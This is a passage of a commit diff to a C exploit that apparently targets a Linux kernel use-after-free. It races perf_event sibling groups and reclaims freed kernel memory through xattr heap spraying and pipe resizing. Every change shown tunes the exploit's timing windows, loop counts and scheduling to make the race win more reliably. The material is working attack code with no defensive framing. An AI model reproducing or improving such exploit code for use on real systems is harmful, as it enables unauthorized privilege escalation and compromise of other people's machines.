2929#include <signal.h>
3030
3131// #define TIMER 71000
32- #define MIN 60000
33- #define MAX 71000
32+ #define MIN 58000
33+ #define MAX 79000
3434#define SIBLINGS_MAX 1024 // about 0x4000 ~
3535#define CPU_A 1 // main cpu
3636#define CPU_B 0
@@ -305,7 +305,7 @@ void race(int group_leader) { // caller must have ownership of the group
305305 if (child_pid == 0 ) { // child read
306306 _pin_to_cpu (CPU_A );
307307 sched_yield ();
308- DEBUG_PRINT ();
308+ // DEBUG_PRINT();
309309 raise (SIGSTOP ); // stop - keep same generation
310310 for (int i = 0 ; i < 512 + 511 ; i ++ ){
311311 ioctl (siblings [i ], PERF_EVENT_IOC_RESET , PERF_IOC_FLAG_GROUP );
@@ -329,10 +329,9 @@ void race(int group_leader) { // caller must have ownership of the group
329329 write (pipefd [1 ], buffer , 1 ); // sync point A
330330 remove_xattr ("security.x12296_10" , 1 );
331331 // x10 reclaimed by CPU_B is now released on CPU_A
332- for (int _ = 0 ; _ < 32 ; _ ++ ) {
332+ for (int _ = 0 ; _ < 48 ; _ ++ ) {
333333 read (group_leader , buf , sizeof (buf ));
334334 }
335- sched_yield ();
336335 remove_xattr ("security.ssiphim" , 1 );
337336 if (setxattr ("/tmp/x1" , "security.x12296_10" , buf , 0x3008 , 0 ) < 0 ) {
338337 perror ("reclaim failed" );
@@ -347,7 +346,7 @@ void race(int group_leader) { // caller must have ownership of the group
347346 exit (0 );
348347 }
349348 else if (child_pid > 0 ) { // parent
350- DEBUG_PRINT ();
349+ // DEBUG_PRINT();
351350 struct perf_event_attr pe ;
352351 memset (& pe , 0 , sizeof (pe ));
353352 pe .type = PERF_TYPE_SOFTWARE ;
@@ -476,7 +475,6 @@ pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){
476475 // this reclaim process must be atomic
477476 remove_xattr ("security.x12296_11" , 1 );
478477 resize_pipe (vuln_pipe [1 ], 0x1000 * 220 );
479- sched_yield ();
480478 remove_xattr ("security.x12296_10" , 1 );
481479 remove_xattr ("security.x12296_7" , 1 );
482480 if (setxattr ("/tmp/x1" , "security.x12296_10" , buf , 0x3008 , 0 ) < 0 ) {
0 commit comments